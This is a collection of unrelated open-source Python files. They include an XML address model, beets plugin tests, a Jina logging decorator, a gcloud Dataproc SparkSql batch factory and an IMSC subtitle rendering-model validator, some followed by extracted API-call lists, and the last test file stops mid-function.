((2718, 2738), 'acondbs.db.sa.sa.session.add', 'sa.session.add', (['map1'], {}), '(map1)\n', (2732, 2738), False, 'from acondbs.db.sa import sa\n'), ((2747, 2766), 'acondbs.db.sa.sa.session.commit', 'sa.session.commit', ([], {}), '()\n', (2764, 2766), False, 'from acondbs.db.sa import sa\n'), ((430, 445), 'acondbs.models.Map.query.all', 'Map.query.all', ([], {}), '()\n', (443, 445), False, 'from acondbs.models import Map, Beam\n'), ((746, 761), 'acondbs.models.Map.query.all', 'Map.query.all', ([], {}), '()\n', (759, 761), False, 'from acondbs.models import Map, Beam\n'), ((846, 878), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (865, 878), False, 'from acondbs.models import Map, Beam\n'), ((1207, 1239), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1226, 1239), False, 'from acondbs.models import Map, Beam\n'), ((1374, 1406), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (1393, 1406), False, 'from acondbs.models import Map, Beam\n'), ((2110, 2144), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'map_id': 'map_id'}), '(map_id=map_id)\n', (2129, 2144), False, 'from acondbs.models import Map, Beam\n'), ((3025, 3057), 'acondbs.models.Map.query.filter_by', 'Map.query.filter_by', ([], {'name': '"""map1"""'}), "(name='map1')\n", (3044, 3057), False, 'from acondbs.models import Map, Beam\n'), ((3082, 3116), 'acondbs.models.Beam.query.filter_by', 'Beam.query.filter_by', ([], {'name': '"""beam1"""'}), "(name='beam1')\n", (3102, 3116), False, 'from acondbs.models import Map, Beam\n')] |
from yattag import Doc
from .SimpleContent import (
AddressText,
AddressTypeName,
CountryCode,
CountyCode,
LocalityName,
PostalCode,
StateCode,
SupplementalAddressText,
)
class OrganizationAddress:
"""
The physical address of an organization.
"""
__addressTypeName: AddressTypeName
__addressText: AddressText
__supplementalAddressText: SupplementalAddressText
__localityName: LocalityName
__stateCode: StateCode
__postalCode: PostalCode
__countryCode: CountryCode
__countyCode: CountyCode
def __init__(
self,
o: dict = None,
*,
addressTypeName: AddressTypeName = None,
addressText: AddressText = None,
supplementalAddressText: SupplementalAddressText = None,
localityName: LocalityName = None,
stateCode: StateCode = None,
postalCode: PostalCode = None,
countryCode: CountryCode = None,
countyCode: CountyCode = None
):
if isinstance(o, OrganizationAddress):
# Assign attributes from object without typechecking
self.__addressTypeName = o.addressTypeName
self.__addressText = o.addressText
self.__supplementalAddressText = o.supplementalAddressText
self.__localityName = o.localityName
self.__stateCode = o.stateCode
self.__postalCode = o.postalCode
self.__countryCode = o.countryCode
self.__countyCode = o.countyCode
elif isinstance(o, dict):
# Assign attributes from dictionary with typechecking
self.addressTypeName = o.get("addressTypeName")
self.addressText = o.get("addressText")
self.supplementalAddressText = o.get("supplementalAddressText")
self.localityName = o.get("localityName")
self.stateCode = o.get("stateCode")
self.postalCode = o.get("postalCode")
self.countryCode = o.get("countryCode")
self.countyCode = o.get("countyCode")
else:
# Assign attributes from named keywords with typechecking
self.addressTypeName = addressTypeName
self.addressText = addressText
self.supplementalAddressText = supplementalAddressText
self.localityName = localityName
self.stateCode = stateCode
self.postalCode = postalCode
self.countryCode = countryCode
self.countyCode = countyCode
@property
def addressTypeName(self) -> AddressTypeName:
return self.__addressTypeName
@addressTypeName.setter
def addressTypeName(self, val: AddressTypeName) -> None:
self.__addressTypeName = None if val is None else AddressTypeName(val)
@property
def addressText(self) -> AddressText:
return self.__addressText
@addressText.setter
def addressText(self, val: AddressText) -> None:
self.__addressText = None if val is None else AddressText(val)
@property
def supplementalAddressText(self) -> SupplementalAddressText:
return self.__supplementalAddressText
@supplementalAddressText.setter
def supplementalAddressText(self, val: SupplementalAddressText) -> None:
self.__supplementalAddressText = (
None if val is None else SupplementalAddressText(val)
)
@property
def localityName(self) -> LocalityName:
return self.__localityName
@localityName.setter
def localityName(self, val: LocalityName) -> None:
self.__localityName = None if val is None else LocalityName(val)
@property
def stateCode(self) -> StateCode:
return self.__stateCode
@stateCode.setter
def stateCode(self, val: StateCode) -> None:
self.__stateCode = None if val is None else StateCode(val)
@property
def postalCode(self) -> PostalCode:
return self.__postalCode
@postalCode.setter
def postalCode(self, val: PostalCode) -> None:
self.__postalCode = None if val is None else PostalCode(val)
@property
def countryCode(self) -> CountryCode:
return self.__countryCode
@countryCode.setter
def countryCode(self, val: CountryCode) -> None:
self.__countryCode = None if val is None else CountryCode(val)
@property
def countyCode(self) -> CountyCode:
return self.__countyCode
@countyCode.setter
def countyCode(self, val: CountyCode) -> None:
self.__countyCode = None if val is None else CountyCode(val)
def generateXML(self, name: str = "OrganizationAddress") -> str:
doc = Doc()
line = doc.line
tag = doc.tag
with tag(name):
if self.__addressTypeName is not None:
line("AddressTypeName", self.__addressTypeName)
if self.__addressText is not None:
line("AddressText", self.__addressText)
if self.__supplementalAddressText is not None:
line("SupplementalAddressText", self.__supplementalAddressText)
if self.__localityName is not None:
line("LocalityName", self.__localityName)
if self.__stateCode is not None:
line("StateCode", self.__stateCode)
if self.__postalCode is not None:
line("PostalCode", self.__postalCode)
if self.__countryCode is not None:
line("CountryCode", self.__countryCode)
if self.__countyCode is not None:
line("CountyCode", self.__countyCode)
return doc.getvalue()
| [
"yattag.Doc"
] | [((4778, 4783), 'yattag.Doc', 'Doc', ([], {}), '()\n', (4781, 4783), False, 'from yattag import Doc\n')] |
import os
import sys
from helper import CopyArtifactsTestCase
from beets import config
class CopyArtifactsFilename(CopyArtifactsTestCase):
"""
Tests to check handling of artifacts with filenames containing unicode characters
"""
def setUp(self):
super(CopyArtifactsFilename, self).setUp()
self._set_import_dir()
self.album_path = os.path.join(self.import_dir, 'the_album')
os.makedirs(self.album_path)
self._setup_import_session(autotag=False)
config['copyartifacts']['extensions'] = '.file'
def test_import_dir_with_unicode_character_in_artifact_name_copy(self):
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_unicode_character_in_artifact_name_move(self):
config['import']['move'] = True
open(os.path.join(self.album_path, u'\xe4rtifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'), 'full.mp3')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album', u'\xe4rtifact.file')
def test_import_dir_with_illegal_character_in_album_name(self):
config['paths']['ext:file'] = unicode('$albumpath/$artist - $album')
# Create import directory, illegal filename character used in the album name
open(os.path.join(self.album_path, u'artifact.file'), 'a').close()
medium = self._create_medium(os.path.join(self.album_path, 'track_1.mp3'),
'full.mp3',
'Tag Album?')
self.import_media = [medium]
self._run_importer()
self.assert_in_lib_dir('Tag Artist', 'Tag Album_', u'Tag Artist - Tag Album_.file')
| [
"os.path.join",
"os.makedirs"
] | [((373, 415), 'os.path.join', 'os.path.join', (['self.import_dir', '"""the_album"""'], {}), "(self.import_dir, 'the_album')\n", (385, 415), False, 'import os\n'), ((424, 452), 'os.makedirs', 'os.makedirs', (['self.album_path'], {}), '(self.album_path)\n', (435, 452), False, 'import os\n'), ((753, 797), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (765, 797), False, 'import os\n'), ((1191, 1235), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (1203, 1235), False, 'import os\n'), ((1740, 1784), 'os.path.join', 'os.path.join', (['self.album_path', '"""track_1.mp3"""'], {}), "(self.album_path, 'track_1.mp3')\n", (1752, 1784), False, 'import os\n'), ((651, 698), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""ärtifact.file"""'], {}), "(self.album_path, u'ärtifact.file')\n", (663, 698), False, 'import os\n'), ((1089, 1136), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""ärtifact.file"""'], {}), "(self.album_path, u'ärtifact.file')\n", (1101, 1136), False, 'import os\n'), ((1641, 1688), 'os.path.join', 'os.path.join', (['self.album_path', 'u"""artifact.file"""'], {}), "(self.album_path, u'artifact.file')\n", (1653, 1688), False, 'import os\n')] |
import functools
import os
import time
from typing import List
from jina import DocumentArray
from jina.logging.logger import JinaLogger
from jina.enums import LogVerbosity
def _get_non_empty_fields_doc_array(docs: DocumentArray) -> List[str]:
non_empty_fields = list(docs[0].non_empty_fields)
for doc in docs[:1]:
for field in non_empty_fields:
if field not in doc.non_empty_fields:
non_empty_fields.pop(field)
return non_empty_fields
def add_request_logger(logger):
"""
Add logging functionality to a request function.
Only shows logs for `JINA_LOG_LEVEL` > info.
You can set this as an env variable before starting your `Jina` application.
Example usages:
>>> from jina import Executor, requests
>>> my_logger = JinaLogger('MyExecLogger')
>>>
>>> class MyExec(Executor):
>>> @requests
>>> @add_request_logger(my_logger)
>>> def index(self, docs, parameters, **kwargs):
>>> ...
:param logger: The logger you want to use
"""
def decorator(function):
@functools.wraps(function)
def wrapper(self, docs, parameters, **kwargs):
verbose_level = os.environ.get('JINA_LOG_LEVEL', None)
verbose_level = LogVerbosity.from_string(verbose_level) if verbose_level else None
if verbose_level is None or verbose_level > LogVerbosity.DEBUG:
return function(self, docs, parameters, **kwargs)
if not docs:
logger.debug('Docs is None. Nothing to monitor')
return function(self, docs, parameters, **kwargs)
logger.debug(f'📄 Received request containing {len(docs)} documents.')
logger.debug(f'📕 Received parameters dictionary: {parameters}')
if len(docs) > 0:
non_empty_fields = _get_non_empty_fields_doc_array(docs)
logger.debug(f'🏷 Non-empty fields {non_empty_fields}')
start_time = time.time()
result = function(self, docs, parameters, **kwargs)
end_time = time.time()
logger.debug(f'⏱ Elapsed time for request {end_time - start_time} seconds.')
return result
return wrapper
return decorator
| [
"os.environ.get",
"jina.enums.LogVerbosity.from_string",
"functools.wraps",
"time.time"
] | [((1100, 1125), 'functools.wraps', 'functools.wraps', (['function'], {}), '(function)\n', (1115, 1125), False, 'import functools\n'), ((1209, 1247), 'os.environ.get', 'os.environ.get', (['"""JINA_LOG_LEVEL"""', 'None'], {}), "('JINA_LOG_LEVEL', None)\n", (1223, 1247), False, 'import os\n'), ((2002, 2013), 'time.time', 'time.time', ([], {}), '()\n', (2011, 2013), False, 'import time\n'), ((2101, 2112), 'time.time', 'time.time', ([], {}), '()\n', (2110, 2112), False, 'import time\n'), ((1276, 1315), 'jina.enums.LogVerbosity.from_string', 'LogVerbosity.from_string', (['verbose_level'], {}), '(verbose_level)\n', (1300, 1315), False, 'from jina.enums import LogVerbosity\n')] |
# PROJECT : kungfucms
# TIME : 2020/6/9 12:54
# AUTHOR : <NAME>
# EMAIL : <EMAIL>
# PHONE : 13811754531
# WECHAT : 13811754531
# https://github.com/youngershen
from django.core.signals import request_started, \
request_finished
from django.dispatch import Signal, receiver
before_sign_in = Signal(providing_args=["toppings", "size"])
after_sign_in = Signal(providing_args=["toppings", "size"])
sign_in_post_permission = Signal(providing_args=["toppings", "size"])
@receiver(request_started)
def before_request(sender, **kwargs):
pass
@receiver(request_finished)
def after_request(sender, **kwargs):
pass
| [
"django.dispatch.receiver",
"django.dispatch.Signal"
] | [((299, 342), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (305, 342), False, 'from django.dispatch import Signal, receiver\n'), ((359, 402), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (365, 402), False, 'from django.dispatch import Signal, receiver\n'), ((430, 473), 'django.dispatch.Signal', 'Signal', ([], {'providing_args': "['toppings', 'size']"}), "(providing_args=['toppings', 'size'])\n", (436, 473), False, 'from django.dispatch import Signal, receiver\n'), ((477, 502), 'django.dispatch.receiver', 'receiver', (['request_started'], {}), '(request_started)\n', (485, 502), False, 'from django.dispatch import Signal, receiver\n'), ((553, 579), 'django.dispatch.receiver', 'receiver', (['request_finished'], {}), '(request_finished)\n', (561, 579), False, 'from django.dispatch import Signal, receiver\n')] |
# -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Factory class for SparkSqlBatch message."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from apitools.base.py import encoding
from googlecloudsdk.command_lib.dataproc import flags
from googlecloudsdk.command_lib.dataproc import local_file_uploader
class SparkSqlBatchFactory(object):
"""Factory class for SparkSqlBatch message."""
def __init__(self, dataproc):
"""Factory class for SparkSqlBatch message.
Args:
dataproc: A Dataproc instance.
"""
self.dataproc = dataproc
def UploadLocalFilesAndGetMessage(self, args):
"""Uploads local files and creates a SparkSqlBatch message.
Uploads user local files and change the URIs to local files to uploaded
URIs.
Creates a SparkSqlBatch message.
Args:
args: Parsed arguments.
Returns:
A SparkSqlBatch message instance.
Raises:
AttributeError: Bucket is required to upload local files, but not
specified.
"""
kwargs = {}
dependencies = {}
# Upload requires a list.
dependencies['queryFileUri'] = [args.SQL_SCRIPT]
if args.jar_files:
dependencies['jarFileUris'] = args.jar_files
if args.jars:
dependencies['jarFileUris'] = args.jars
params = None
if args.script_variables:
params = args.script_variables
elif args.vars:
params = args.vars
if params:
kwargs['queryVariables'] = encoding.DictToAdditionalPropertyMessage(
params,
self.dataproc.messages.SparkSqlBatch.QueryVariablesValue,
sort_items=True)
if local_file_uploader.HasLocalFiles(dependencies):
bucket = args.deps_bucket if args.deps_bucket is not None else args.bucket
if not bucket:
raise AttributeError('--deps-bucket was not specified.')
dependencies = local_file_uploader.Upload(args.bucket, dependencies)
# Move main SQL script out of the list.
dependencies['queryFileUri'] = dependencies['queryFileUri'][0]
# Merge the dictionaries first for compatibility.
kwargs.update(dependencies)
return self.dataproc.messages.SparkSqlBatch(**kwargs)
def AddArguments(parser):
flags.AddMainSqlScript(parser)
flags.AddJarFiles(parser)
flags.AddSqlScriptVariables(parser)
# Cloud Storage bucket to upload workload dependencies.
# It is required until we figure out a place to upload user files.
flags.AddBucket(parser)
| [
"googlecloudsdk.command_lib.dataproc.flags.AddBucket",
"googlecloudsdk.command_lib.dataproc.local_file_uploader.HasLocalFiles",
"googlecloudsdk.command_lib.dataproc.flags.AddJarFiles",
"googlecloudsdk.command_lib.dataproc.flags.AddMainSqlScript",
"googlecloudsdk.command_lib.dataproc.flags.AddSqlScriptVariables",
"apitools.base.py.encoding.DictToAdditionalPropertyMessage",
"googlecloudsdk.command_lib.dataproc.local_file_uploader.Upload"
] | [((2824, 2854), 'googlecloudsdk.command_lib.dataproc.flags.AddMainSqlScript', 'flags.AddMainSqlScript', (['parser'], {}), '(parser)\n', (2846, 2854), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2857, 2882), 'googlecloudsdk.command_lib.dataproc.flags.AddJarFiles', 'flags.AddJarFiles', (['parser'], {}), '(parser)\n', (2874, 2882), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2885, 2920), 'googlecloudsdk.command_lib.dataproc.flags.AddSqlScriptVariables', 'flags.AddSqlScriptVariables', (['parser'], {}), '(parser)\n', (2912, 2920), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((3050, 3073), 'googlecloudsdk.command_lib.dataproc.flags.AddBucket', 'flags.AddBucket', (['parser'], {}), '(parser)\n', (3065, 3073), False, 'from googlecloudsdk.command_lib.dataproc import flags\n'), ((2245, 2292), 'googlecloudsdk.command_lib.dataproc.local_file_uploader.HasLocalFiles', 'local_file_uploader.HasLocalFiles', (['dependencies'], {}), '(dependencies)\n', (2278, 2292), False, 'from googlecloudsdk.command_lib.dataproc import local_file_uploader\n'), ((2082, 2210), 'apitools.base.py.encoding.DictToAdditionalPropertyMessage', 'encoding.DictToAdditionalPropertyMessage', (['params', 'self.dataproc.messages.SparkSqlBatch.QueryVariablesValue'], {'sort_items': '(True)'}), '(params, self.dataproc.messages.\n SparkSqlBatch.QueryVariablesValue, sort_items=True)\n', (2122, 2210), False, 'from apitools.base.py import encoding\n'), ((2482, 2535), 'googlecloudsdk.command_lib.dataproc.local_file_uploader.Upload', 'local_file_uploader.Upload', (['args.bucket', 'dependencies'], {}), '(args.bucket, dependencies)\n', (2508, 2535), False, 'from googlecloudsdk.command_lib.dataproc import local_file_uploader\n')] |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2021, Pearl TV LLC
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Hypothetical Render Model (HRM)'''
__author__ = "<NAME> <<EMAIL>>"
import typing
from dataclasses import dataclass
from fractions import Fraction
from numbers import Number
import logging
import ttconv.isd
import ttconv.style_properties as styles
import ttconv.model
from ._gcpy_codepoints import GCPY_12
LOGGER = logging.getLogger(__name__)
_BDRAW = 12
_GCPY_BASE = 12
_GCPY_OTHER = 3
_REN_G_CJK = 0.6
_REN_G_OTHER = 1.2
_NGBS = 1
_IPD = 1
@dataclass
class ISDStatistics:
dur: Number = 0 # HRM ISD time
dur_d: Number = 0 # HRM background drawing time
nbg_total: Number = 0 # Number of backgrounds drawn
clear: bool = False # Whether the root container had to be cleared
dur_t: Number = 0 # HRM text drawing time
ngra_t: Number = 0 # Total Normalized Rendered Glyph Area
gcpy_count: Number = 0 # Total number of glyphs copied
gren_count: Number = 0 # Total number of glyphs rendered
is_empty: bool = False # Does the ISD contain any content
class EventHandler:
'''Allows a callee to inform the caller of events that occur during processing. Typically
overridden by the caller.
'''
@staticmethod
def _format_message(msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
return (
f"{msg} at {float(time_offset):.3f}s (doc #{doc_index})\n"
f" available time: {float(available_time):.3f}s | HRM time: {float(stats.dur):.3f}\n"
f" Glyph copy count: {stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\n"
)
def info(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.info(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def warn(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def error(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def debug(self, msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics):
LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats))
def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()):
'''Determines whether the sequence of ISDs returned by `isd_iterator` conform to the IMSC HRM.
`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD instance whose
active interval starts at `begin` seconds and ends immediately before the `begin` value of the next
ISD. Errors, warnings and info messages are signalled through callbacks on the `event_handler`.
'''
hrm = HRM()
last_offset = 0
is_last_isd_empty = True
for doc_index, (time_offset, isd) in enumerate(isd_iterator):
if time_offset < last_offset:
raise RuntimeError("ISDs are not in order of increasing offset")
stats = hrm.next_isd(isd, doc_index, is_last_isd_empty)
avail_render_time = _IPD if doc_index == 0 else time_offset - last_offset
if stats.dur > avail_render_time:
event_handler.error("Rendering time exceeded", doc_index, time_offset, avail_render_time, stats)
if stats.ngra_t > 1:
event_handler.error("NGBS exceeded", doc_index, time_offset, avail_render_time, stats)
event_handler.debug("Processed document", doc_index, time_offset, avail_render_time, stats)
if not (stats.is_empty and is_last_isd_empty):
last_offset = time_offset
is_last_isd_empty = stats.is_empty
@dataclass(frozen=True)
class _Glyph:
char: str
color : styles.ColorType
font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]]
font_size: styles.LengthType
font_style: styles.FontStyleType
font_weight: styles.FontWeightType
text_decoration: styles.TextDecorationType
text_outline: styles.TextOutlineType
text_shadow: styles.TextShadowType
background_color: styles.ColorType
class HRM:
def __init__(self):
self.back_buffer: typing.Set[_Glyph] = set()
self.isd_stats: ISDStatistics = None
def next_isd(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
) -> ISDStatistics:
self.isd_stats = ISDStatistics()
self._compute_dur_t(isd, index_n)
self._compute_dur_d(isd, index_n, is_last_isd_empty)
self.isd_stats.dur = self.isd_stats.dur_t + self.isd_stats.dur_d
return self.isd_stats
def _compute_dur_d(
self,
isd: typing.Type[ttconv.isd.ISD],
index_n: int,
is_last_isd_empty: bool
):
self.isd_stats.is_empty = True
draw_area = 0 if index_n == 0 or is_last_isd_empty else 1
self.isd_stats.clear = draw_area != 0
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
self.isd_stats.is_empty = False
nbg = 0
for element in region.dfs_iterator():
# should body elements really be excluded? -> NO
# should transparent backgrounds really be counted? -> NO
# should span and br really be included -> yes for now
# should br really be included -> no
if isinstance(element, ttconv.model.Br):
continue
bg_color = element.get_style(styles.StyleProperties.BackgroundColor)
if bg_color is not None:
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] != 0:
nbg += 1
draw_area += _region_normalized_size(region) * nbg
self.isd_stats.nbg_total += nbg
self.isd_stats.dur_d = draw_area / _BDRAW
def _compute_dur_t(
self,
isd: typing.Type[ttconv.isd.ISD],
_index_n: int
):
front_buffer = set()
if isd is not None:
for region in isd.iter_regions():
if not _is_presented_region(region):
continue
for element in region.dfs_iterator():
if not isinstance(element, ttconv.model.Text):
continue
parent = element.parent()
nrga = _compute_nrga(element)
for char in element.get_text():
glyph = _Glyph(
char=char,
color=parent.get_style(styles.StyleProperties.Color),
font_family=parent.get_style(styles.StyleProperties.FontFamily),
font_size=parent.get_style(styles.StyleProperties.FontSize),
font_style=parent.get_style(styles.StyleProperties.FontStyle),
font_weight=parent.get_style(styles.StyleProperties.FontWeight),
text_decoration=parent.get_style(styles.StyleProperties.TextDecoration),
text_outline=parent.get_style(styles.StyleProperties.TextOutline),
text_shadow=parent.get_style(styles.StyleProperties.TextShadow),
background_color=parent.get_style(styles.StyleProperties.BackgroundColor)
)
if glyph in front_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.gcpy_count += 1
elif glyph in self.back_buffer:
self.isd_stats.dur_t += nrga / _compute_gcpy(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gcpy_count += 1
else:
self.isd_stats.dur_t += nrga / _compute_ren_g(char)
self.isd_stats.ngra_t += nrga
self.isd_stats.gren_count += 1
front_buffer.add(glyph)
self.back_buffer = front_buffer
def _compute_nrga(element: typing.Type[ttconv.model.Text]):
font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize)
if font_size.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported fontSize units: {font_size.units}")
return font_size.value * font_size.value / 10000
def _compute_ren_g(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _REN_G_CJK if 0x4E00 <= ord(char) <= 0x9FFF else _REN_G_OTHER
def _compute_gcpy(char: str):
if len(char) != 1:
raise ValueError("Argument must be a string of length 1")
return _GCPY_BASE if ord(char) in GCPY_12 else _GCPY_OTHER
def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]):
region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent)
if region_extent.width.units is not styles.LengthType.Units.rw:
raise RuntimeError(f"Unsupported extent width units: {region_extent.width.units}")
if region_extent.height.units is not styles.LengthType.Units.rh:
raise RuntimeError(f"Unsupported extent height units: {region_extent.height.units}")
return region_extent.width.value * region_extent.height.value / 10000
def _is_presented_region(region: typing.Type[ttconv.isd.ISD.Region]):
'''See https://www.w3.org/TR/ttml-imsc1.1/#dfn-presented-region
'''
if region.get_style(styles.StyleProperties.Opacity) == 0:
return False
if region.get_style(styles.StyleProperties.Display) is styles.DisplayType.none:
return False
if region.get_style(styles.StyleProperties.Visibility) is styles.DisplayType.none:
return False
if region.has_children():
return True
if region.get_style(styles.StyleProperties.ShowBackground) is not styles.ShowBackgroundType.always:
return False
bg_color: styles.ColorType = region.get_style(styles.StyleProperties.BackgroundColor)
if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8:
raise RuntimeError(f"Unsupported colorimetry system: {bg_color.ident}")
if bg_color.components[3] == 0:
return False
return True
| [
"dataclasses.dataclass",
"logging.getLogger"
] | [((1687, 1714), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1704, 1714), False, 'import logging\n'), ((5222, 5244), 'dataclasses.dataclass', 'dataclass', ([], {'frozen': '(True)'}), '(frozen=True)\n', (5231, 5244), False, 'from dataclasses import dataclass\n')] |
import os
from vibration_compensation import read_gcode, Data
import pytest
from numpy.testing import *
import numpy as np
import scipy as sp
import vibration_compensation.bokeh_imports as plt
@pytest.fixture(scope="module")
def figures():
path, filename = os.path.split(os.path.realpath(__file__))
path = os.path.join(path, "output")
os.makedirs(path, exist_ok=True)
plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + ".html"))
ret = []
yield ret
plt.save(ret)
def generate_curves(gcode, maximum_error):
data = read_gcode(gcode, maximum_error)
return data
@pytest.fixture(scope="function")
def plotter(figures, request):
def plot(data: Data):
p = plt.Figure(
plot_width=1000,
plot_height=1000,
x_range=(-250, 250),
y_range=(-250, 250),
match_aspect=True,
lod_threshold=None,
title=request.node.name
)
p.segment(
x0=data.start_xy[:, 0],
x1=data.end_xy[:, 0],
y0=data.start_xy[:, 1],
y1=data.end_xy[:, 1],
line_width=1,
line_color="red",
line_dash="dotted"
)
ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)
points = data.smoothed_toolpath(ts)
p.line(
points[:,0],
points[:,1],
line_width=2,
line_color="blue",
line_dash="solid"
)
p.circle(
points[:,0],
points[:,1],
size=4,
fill_color="white"
)
figures.append(p)
return plot
def point_on_line(linea, lineb, point):
return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\
- np.linalg.norm(linea - lineb)
def point_on_middle_of_line(linea, lineb, point):
mid = (lineb - linea) * 0.5 + linea
return np.linalg.norm(point - mid)
class SegmentChecker(object):
def __init__(self,data, l, s, start, end, corner):
self.data = data
self.s = s
self.start = start
self.end = end
self.start_point = data.start_xy[l]
self.end_point = data.end_xy[l]
if l != data.start_xy.shape[0] - 1:
self.next_start_point = data.start_xy[l+1]
self.next_end_point = data.end_xy[l+1]
self.spline = data.smoothed_toolpath
if corner:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_mid = l + 1.0
self.spline_end = data.smoothed_toolpath.segment_end[s]
else:
self.spline_start = data.smoothed_toolpath.segment_start[s]
self.spline_end = data.smoothed_toolpath.segment_end[s]
self.spline_mid = (self.spline_start + self.spline_end) / 2.0
xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)
self.start_line_dist = np.sum(xy_lengths[:l])
self.line_length = xy_lengths[l]
if l < data.start_xy.shape[0] - 1:
self.start_next_line_dist = self.start_line_dist + self.line_length
self.next_line_length = xy_lengths[l+1]
def check_distance(self, spline, line):
msg = "The spline start distance does not match"
if line <= 1.0:
line_dist = self.start_line_dist + self.line_length * line
else:
line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)
assert self.spline.distance(spline) <= line_dist and \
self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \
msg
def check_start_point_start(self):
msg = "The start point of the spline segment does not match the line start point"
assert_array_almost_equal(self.spline(self.spline_start), self.start_point,
err_msg=msg)
self.check_distance(self.spline_start, 0)
def check_start_point_on(self):
msg = "The start point of the spline segment is not on the line"
